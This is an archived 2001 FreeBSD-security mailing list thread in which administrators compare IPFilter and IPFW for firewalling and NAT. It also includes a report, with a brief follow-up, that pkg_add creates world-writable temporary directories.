Wed, 21 Nov 2001 16:49:24 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | I'm about to install a FreeBSD 4.4 box with some firewall and | I need to know | wich one of the freeware firewalls product is the best (IPFW, | IPFilter, | etc), or maybe if you could recomend me a good solution for | this situation: I would say that IPFilter is your best option at the moment. It is very rich in features and I believe it has some NAT-specific functionality built into it, although I've never used the NAT stuff so I can't vouch for it personally. You can also compile to kernel to use both ipfw and ipfilter for the best of both worlds. When you do this, I am not sure which one get's passed the packet first however. Thanks Lee -- Lee Brotherston - IP Security Manager, Easynet Ltd http://www.easynet.net/ Phone: +44 20 7900 4444 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9: 1:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id 86DCD37B416 for ; Wed, 21 Nov 2001 09:01:16 -0800 (PST) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id RAA12123 for ; Wed, 21 Nov 2001 17:01:15 GMT Date: Wed, 21 Nov 2001 17:01:15 +0000 (GMT) From: freebsd-security@rikrose.net X-Sender: rik@pkl.net To: security@FreeBSD.ORG Subject: RE: Best security topology for FreeBSD In-Reply-To: <7052044C7D7AD511A20200508B5A9C585169B6@MAGRAT> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For something that large, I'd wonder why you're not using a hardware router, but, to answer the question that was asked, I'd use *both* IPFilter and IPFW. I would use ipfilter for filtering and NAT (if needed), since it is actually better at doing that, and ipfw for bandwidth limiting/traffic shaping. As to which one sees the packet first, packets would come in on an interface, go through the ipfw rules, then the ipfilter rules, then out again (possibly through the rules again, assuming you don't do anything like use fastroute rules on either). Basically, ipfw doesn't give as much control over the packets and filtering as ipfilter, so use both. Useful url: http://www.obfuscation.org/ipf there's probably a good one for ipfw too, but i use ipfilter, and haven't had the need for traffic shaping yet... -- PGP Key: D2729A3F - Keyserver: wwwkeys.uk.pgp.net - rich at rdrose dot org Key fingerprint = 5EB1 4C63 9FAD D87B 854C 3DED 1408 ED77 D272 9A3F Public key also encoded with outguess on http://rikrose.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9: 6:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from kumquat.mail.uk.easynet.net (kumquat.mail.uk.easynet.net [195.40.1.42]) by hub.freebsd.org (Postfix) with ESMTP id 0F48937B416 for ; Wed, 21 Nov 2001 09:06:12 -0800 (PST) Received: from magrat.office.easynet.net ([195.40.3.130]) by kumquat.mail.uk.easynet.net with esmtp (Exim 3.33 #1) id 166ap9-0005Bq-00 for security@FreeBSD.ORG; Wed, 21 Nov 2001 17:06:11 +0000 Received: by MAGRAT with Internet Mail Service (5.5.2653.19) id ; Wed, 21 Nov 2001 17:06:11 -0000 Message-ID: <7052044C7D7AD511A20200508B5A9C585169B7@MAGRAT> From: Lee Brotherston To: security@FreeBSD.ORG Subject: RE: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 17:06:11 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | I would use ipfilter for filtering and NAT (if needed), since it is | actually better at doing that, and ipfw for bandwidth limiting/traffic | shaping. If you're getting into shaping, then Dummynet is worth a peek, you do need ipfw for that. Lee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:11:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsas1i.audiotel.com.ar (host030038.prima.com.ar [200.42.30.38]) by hub.freebsd.org (Postfix) with ESMTP id 1745B37B417 for ; Wed, 21 Nov 2001 09:11:41 -0800 (PST) Received: from audi2k (audi2k.audiotel.com.ar [192.168.100.237]) (authenticated) by bsas1i.audiotel.com.ar (8.11.6/8.11.6) with ESMTP id fALHBdt30220 for ; Wed, 21 Nov 2001 14:11:39 -0300 (ART) From: "Fernando Germano" To: Subject: RE: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 14:12:12 -0300 Message-ID: <00d201c172af$a96227b0$ed64a8c0@audi2k> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org We'll, the answer is simple: money, we don't use something like PIX because it's way too expensive for something like this. I'm worried about NAT, will FreeBSD and IpFilter be able to NAT all of this traffic?? -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of freebsd-security@rikrose.net Sent: Miércoles, 21 de Noviembre de 2001 02:01 p.m. To: security@FreeBSD.ORG Subject: RE: Best security topology for FreeBSD For something that large, I'd wonder why you're not using a hardware router, but, to answer the question that was asked, I'd use *both* IPFilter and IPFW. I would use ipfilter for filtering and NAT (if needed), since it is actually better at doing that, and ipfw for bandwidth limiting/traffic shaping. As to which one sees the packet first, packets would come in on an interface, go through the ipfw rules, then the ipfilter rules, then out again (possibly through the rules again, assuming you don't do anything like use fastroute rules on either). Basically, ipfw doesn't give as much control over the packets and filtering as ipfilter, so use both. Useful url: http://www.obfuscation.org/ipf there's probably a good one for ipfw too, but i use ipfilter, and haven't had the need for traffic shaping yet... -- PGP Key: D2729A3F - Keyserver: wwwkeys.uk.pgp.net - rich at rdrose dot org Key fingerprint = 5EB1 4C63 9FAD D87B 854C 3DED 1408 ED77 D272 9A3F Public key also encoded with outguess on http://rikrose.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:19:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 037FA37B416 for ; Wed, 21 Nov 2001 09:19:32 -0800 (PST) Received: (qmail 16758 invoked by uid 1000); 21 Nov 2001 17:19:30 -0000 Date: Wed, 21 Nov 2001 18:19:29 +0100 From: Bart Matthaei To: freebsd-security@rikrose.net Cc: security@freebsd.org Subject: Re: Best security topology for FreeBSD Message-ID: <20011121181929.A15275@heresy.dreamflow.nl> References: <7052044C7D7AD511A20200508B5A9C585169B6@MAGRAT> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="CE+1k2dSO48ffgeK" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from freebsd-security@rikrose.net on Wed, Nov 21, 2001 at 05:01:15PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --CE+1k2dSO48ffgeK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net wrote: > Basically, ipfw doesn't give as much control over the packets and > filtering as ipfilter, so use both. Care to explain why ? I think ipfw/ipf handle packets just as well.. The only thing i recall is a story about ipfw sending packets trough userland (?!). But thats just a vague story i've read somewhere. I dont see why ipfw can't do what he needs. Ipfw works pretty well with NAT, and it's good with traffic shaping. And I personally haven't had any troubles with ipfw filtering. Regards, B. -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. You just live in it */ --CE+1k2dSO48ffgeK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7++Ihgcc6pR+tCegRAhQUAKC0OftBR5KxsuzRMHhOiM+Sk1+mkwCfScoD M1a8XMAm7VnxvCpMiQmWCq0= =V4E3 -----END PGP SIGNATURE----- --CE+1k2dSO48ffgeK-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:28:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id 8D9A637B417 for ; Wed, 21 Nov 2001 09:28:08 -0800 (PST) Received: from DAVE ([192.168.0.54]) by chaos.evolve.za.net (8.11.6/1.1.3) with SMTP id fALHS3l42557 for ; Wed, 21 Nov 2001 19:28:03 +0200 (SAST) (envelope-from dave@raven.za.net) Message-ID: <005f01c172b1$7a8503c0$3600a8c0@DAVE> From: "Dave Raven" To: References: <20011121181929.A15275@heresy.dreamflow.nl> Subject: Re: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 19:25:12 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ipfw runs in the kernel, but NAT runs in userland. With IPFilter this is not so, IPNat runs in the kernel and should be faster. If you are planning on large usage I would recommend IPFilter (less load) and IPNat. but then, dont quote me. --Dave Optec Sec. ----- Original Message ----- From: "Bart Matthaei" To: Cc: Sent: Wednesday, November 21, 2001 7:19 PM Subject: Re: Best security topology for FreeBSD > On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net > wrote: > > Basically, ipfw doesn't give as much control over the packets and > > filtering as ipfilter, so use both. > > Care to explain why ? I think ipfw/ipf handle packets just as well.. > The only thing i recall is a story about ipfw sending packets trough > userland (?!). But thats just a vague story i've read somewhere. > > I dont see why ipfw can't do what he needs. Ipfw works pretty well > with NAT, and it's good with traffic shaping. And I personally haven't > had any troubles with ipfw filtering. > > Regards, > > B. > > -- > Bart Matthaei bart@dreamflow.nl > > /* Welcome to my world.. You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:29:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts17-srv.bellnexxia.net (tomts17.bellnexxia.net [209.226.175.71]) by hub.freebsd.org (Postfix) with ESMTP id 9822B37B405 for ; Wed, 21 Nov 2001 09:29:34 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts17-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121172933.BKPQ16532.tomts17-srv.bellnexxia.net@khan.anarcat.dyndns.org>; Wed, 21 Nov 2001 12:29:33 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id C653B1A4D; Wed, 21 Nov 2001 12:30:44 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 2ADF820ADB; Wed, 21 Nov 2001 12:31:06 -0500 (EST) Date: Wed, 21 Nov 2001 12:31:06 -0500 From: The Anarcat To: Bart Matthaei Cc: freebsd-security@rikrose.net, security@freebsd.org Subject: Re: Best security topology for FreeBSD Message-ID: <20011121173105.GA44370@shall.anarcat.dyndns.org> Mail-Followup-To: Bart Matthaei , freebsd-security@rikrose.net, security@freebsd.org References: <7052044C7D7AD511A20200508B5A9C585169B6@MAGRAT> <20011121181929.A15275@heresy.dreamflow.nl> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="u3/rZRmxL6MmkK24" Content-Disposition: inline In-Reply-To: <20011121181929.A15275@heresy.dreamflow.nl> User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --u3/rZRmxL6MmkK24 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed Nov 21, 2001 at 06:19:29PM +0100, Bart Matthaei wrote: > On Wed, Nov 21, 2001 at 05:01:15PM +0000, freebsd-security@rikrose.net wr= ote: > > Basically, ipfw doesn't give as much control over the packets and > > filtering as ipfilter, so use both. >=20 > Care to explain why ? For this I don't know. I thought both had the same capabilities too. > I think ipfw/ipf handle packets just as well.. Agreed. > The only thing i recall is a story about ipfw sending packets trough > userland (?!). But thats just a vague story i've read somewhere. It's not a vague story. *In order to do NAT*, you must send packets to the natd daemon, using a divert rule. ipf doesn't need that, as there is a ipnat kernel module to replace natd. a. --u3/rZRmxL6MmkK24 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv75NUACgkQttcWHAnWiGd4yQCfXZcZ4Dxor00WCAbxm6zVvh4S AkYAniw+S6Ej+OW0z3pKTQa4BGaOM8no =PVkx -----END PGP SIGNATURE----- --u3/rZRmxL6MmkK24-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:31:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 77F4737B416 for ; Wed, 21 Nov 2001 09:31:53 -0800 (PST) Received: (qmail 16909 invoked by uid 1000); 21 Nov 2001 17:31:51 -0000 Date: Wed, 21 Nov 2001 18:31:51 +0100 From: Bart Matthaei To: Dave Raven Cc: security@freebsd.org Subject: Re: Best security topology for FreeBSD Message-ID: <20011121183151.B15275@heresy.dreamflow.nl> References: <20011121181929.A15275@heresy.dreamflow.nl> <005f01c172b1$7a8503c0$3600a8c0@DAVE> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="XF85m9dhOBO43t/C" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005f01c172b1$7a8503c0$3600a8c0@DAVE>; from dave@raven.za.net on Wed, Nov 21, 2001 at 07:25:12PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --XF85m9dhOBO43t/C Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Nov 21, 2001 at 07:25:12PM +0200, Dave Raven wrote: > ipfw runs in the kernel, but NAT runs in userland. hmm.. bummer :) > With IPFilter this is not so, IPNat runs in the kernel and should be faster. > If you are planning on large usage I would recommend IPFilter (less load) > and IPNat. I still dont see why ipf would be better when it comes to filtering. B. -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. You just live in it */ --XF85m9dhOBO43t/C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7++UHgcc6pR+tCegRAp5fAKCKtjsVQjdN5sA7h2piTOYf46gMrgCfVEQk 8QEy7tTfc41L9ad8hJKAPGI= =vp8l -----END PGP SIGNATURE----- --XF85m9dhOBO43t/C-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:42: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 2A57937B419 for ; Wed, 21 Nov 2001 09:42:01 -0800 (PST) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id OAA87844; Wed, 21 Nov 2001 14:40:28 -0300 (ART) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Wed, 21 Nov 2001 14:40:28 -0300 From: Fernando Schapachnik To: Fernando Germano Cc: security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD Message-ID: <20011121144028.B27934@ns1.via-net-works.net.ar> References: <00d201c172af$a96227b0$ed64a8c0@audi2k> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <00d201c172af$a96227b0$ed64a8c0@audi2k>; from fgermano@audiotel.com.ar on Wed, Nov 21, 2001 at 02:12:12PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org En un mensaje anterior, Fernando Germano escribió: > > We'll, the answer is simple: money, we don't use something like PIX because > it's way too expensive for something like this. > > I'm worried about NAT, will FreeBSD and IpFilter be able to NAT all of this > traffic?? I've used IP Filter in a couple of heavy-loaded scenarios and never had a problem (also, machine load was almost allways at 0). Good luck. Fernando P. Schapachnik Gerente de tecnología de red y sistemas de información VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 9:44:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id 82D6E37B417 for ; Wed, 21 Nov 2001 09:44:41 -0800 (PST) Received: from nunetnt2.nunet.local ([192.168.0.10]) by chaos.evolve.za.net (8.11.6/1.1.3) with ESMTP id fALHicl42632 for ; Wed, 21 Nov 2001 19:44:39 +0200 (SAST) (envelope-from pheonix@area.co.za) Received: from DAVE (MANDY [192.168.0.54]) by nunetnt2.nunet.local with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id XK5HMX1V; Wed, 21 Nov 2001 19:43:19 +0200 Message-ID: <009d01c172b3$cb35d5e0$3600a8c0@DAVE> From: "Dave Raven" To: References: <20011121183151.B15275@heresy.dreamflow.nl> Subject: Re: Best security topology for FreeBSD Date: Wed, 21 Nov 2001 19:41:45 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This may not be true, but I think that there is far less cpu utilization with IpFilter when it comes to rule proccessing. ----- Original Message ----- From: "Bart Matthaei" To: "Dave Raven" Cc: Sent: Wednesday, November 21, 2001 7:31 PM Subject: Re: Best security topology for FreeBSD > On Wed, Nov 21, 2001 at 07:25:12PM +0200, Dave Raven wrote: > > ipfw runs in the kernel, but NAT runs in userland. > > hmm.. bummer :) > > > With IPFilter this is not so, IPNat runs in the kernel and should be > faster. > > If you are planning on large usage I would recommend IPFilter (less > load) > > and IPNat. > > I still dont see why ipf would be better when it comes to filtering. > > B. > > -- > Bart Matthaei bart@dreamflow.nl > > /* Welcome to my world.. You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 10:23:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id B4C0837B431 for ; Wed, 21 Nov 2001 10:23:07 -0800 (PST) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 1CB891DA7; Wed, 21 Nov 2001 19:22:57 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id D446955A2; Wed, 21 Nov 2001 19:22:57 +0100 (CET) Date: Wed, 21 Nov 2001 19:22:57 +0100 (CET) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: Bart Matthaei Cc: Dave Raven , security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD In-Reply-To: <20011121183151.B15275@heresy.dreamflow.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 21 Nov 2001, Bart Matthaei wrote: > > With IPFilter this is not so, IPNat runs in the kernel and should be faster. > > If you are planning on large usage I would recommend IPFilter (less load) > > and IPNat. > > I still dont see why ipf would be better when it comes to filtering. This issue (at least in one aspect) has been discussed on this list around Oct 30 (thread about keep-state and ICMP). The discussion strayed from the original topic and someone pointed out that ipfilter does a more careful inspection when dealing with dynamic rules (checks TCP sequence numbers etc.). Regards, Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:16:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts10-srv.bellnexxia.net (tomts10.bellnexxia.net [209.226.175.54]) by hub.freebsd.org (Postfix) with ESMTP id F17F237B419 for ; Wed, 21 Nov 2001 11:16:36 -0800 (PST) Received: from khan.anarcat.dyndns.org ([65.94.128.110]) by tomts10-srv.bellnexxia.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20011121191636.CDOF17034.tomts10-srv.bellnexxia.net@khan.anarcat.dyndns.org> for ; Wed, 21 Nov 2001 14:16:36 -0500 Received: from shall.anarcat.dyndns.org (shall.anarcat.dyndns.org [192.168.0.1]) by khan.anarcat.dyndns.org (Postfix) with ESMTP id 408501A38 for ; Wed, 21 Nov 2001 14:17:46 -0500 (EST) Received: by shall.anarcat.dyndns.org (Postfix, from userid 1000) id 6162420ADB; Wed, 21 Nov 2001 14:18:08 -0500 (EST) Date: Wed, 21 Nov 2001 14:18:08 -0500 From: The Anarcat To: FreeBSD Security Issues Subject: fun with pkg_add Message-ID: <20011121191808.GD44370@shall.anarcat.dyndns.org> Mail-Followup-To: FreeBSD Security Issues Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="76DTJ5CE0DCVQemd" Content-Disposition: inline User-Agent: Mutt/1.3.23.2i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --76DTJ5CE0DCVQemd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi! I just noticed something that could be a problem with pkg_add algorithms. When it installs a package, it first untars it in a temporary directory. The problem is that the subdirectories of the package created this way are world-writable: $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.= tgz $ pkg_add auctex-10.0g.tgz ^Z $ ls -l /var/tmp/inst* total 23 -rw-r--r-- 1 root wheel 57 12 nov 02:07 +COMMENT -rw-r--r-- 1 root wheel 11223 12 nov 02:07 +CONTENTS -rw-r--r-- 1 root wheel 1224 12 nov 02:07 +DESC -rw-r--r-- 1 root wheel 815 12 nov 02:07 +DISPLAY -r--r--r-- 1 root wheel 5181 12 nov 02:07 +MTREE_DIRS drwxrwxrwx 2 root wheel 512 21 nov 14:15 info/ drwxrwxrwx 4 root wheel 512 21 nov 14:15 share/ Lovely. I don't exactly know why it happens this way.=20 I think this could be a security problem if a random user happens to run around /var/tmp while the admin is adding a package.=20 Am I wrong? A. --76DTJ5CE0DCVQemd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjv7/e8ACgkQttcWHAnWiGc75wCggihc+/vdzYFd+8FHRPlQEkQm xUwAniELnlhqkKt0cv1dPpAR/nIM+Y1p =cPkK -----END PGP SIGNATURE----- --76DTJ5CE0DCVQemd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:19:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from e-shipley.com (dws-66-177-28-52.jacksonville.net [66.177.28.52]) by hub.freebsd.org (Postfix) with ESMTP id 7EDA137B405 for ; Wed, 21 Nov 2001 11:19:43 -0800 (PST) Received: (from steve@localhost) by e-shipley.com (8.11.6/8.11.1) id fALJJgH03507; Wed, 21 Nov 2001 14:19:42 -0500 (EST) (envelope-from steve) Date: Wed, 21 Nov 2001 14:19:42 -0500 (EST) From: "Stephen T. Shipley" Message-Id: <200111211919.fALJJgH03507@e-shipley.com> To: fgermano@audiotel.com.ar, security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD In-Reply-To: <00ca01c172aa$814c90d0$ed64a8c0@audi2k> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Try "hlfl" located in /usr/ports/security/hlfl. Very useful for evaluating the management languages for ipfw, ipfilter, ipfwadm, ipchains, netfilter, and cisco. In a crunch you need to be quick. So I would favor ease of management (ipfilter). --Steve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 11:37:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 51ED337B405 for ; Wed, 21 Nov 2001 11:37:14 -0800 (PST) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id fALJbD401285; Wed, 21 Nov 2001 13:37:13 -0600 (CST) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id NAA14759; Wed, 21 Nov 2001 13:37:12 -0600 (CST) Message-ID: <3BFC025D.36710154@centtech.com> Date: Wed, 21 Nov 2001 13:37:01 -0600 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: The Anarcat Cc: FreeBSD Security Issues Subject: Re: fun with pkg_add References: <20011121191808.GD44370@shall.anarcat.dyndns.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The only danger I see is a potential that the user could replace the binary with a hacked version, between untaring and installing, creating a breach. Other than that, it's the same as a /var/tmp directory almost. Although I see what you are saying, and do think this could be a potential problem.. Eric The Anarcat wrote: > > Hi! > > I just noticed something that could be a problem with pkg_add > algorithms. When it installs a package, it first untars it in a > temporary directory. The problem is that the subdirectories of the > package created this way are world-writable: > > $ ftp -a ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/All/auctex-10.0g.tgz > $ pkg_add auctex-10.0g.tgz > ^Z > $ ls -l /var/tmp/inst* > total 23 > -rw-r--r-- 1 root wheel 57 12 nov 02:07 +COMMENT > -rw-r--r-- 1 root wheel 11223 12 nov 02:07 +CONTENTS > -rw-r--r-- 1 root wheel 1224 12 nov 02:07 +DESC > -rw-r--r-- 1 root wheel 815 12 nov 02:07 +DISPLAY > -r--r--r-- 1 root wheel 5181 12 nov 02:07 +MTREE_DIRS > drwxrwxrwx 2 root wheel 512 21 nov 14:15 info/ > drwxrwxrwx 4 root wheel 512 21 nov 14:15 share/ > > Lovely. I don't exactly know why it happens this way. > > I think this could be a security problem if a random user happens to run > around /var/tmp while the admin is adding a package. > > Am I wrong? > > A. > > ------------------------------------------------------------ > Part 1.2Type: application/pgp-signature -- ------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology An unbreakable toy is useful for breaking other toys. ------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From 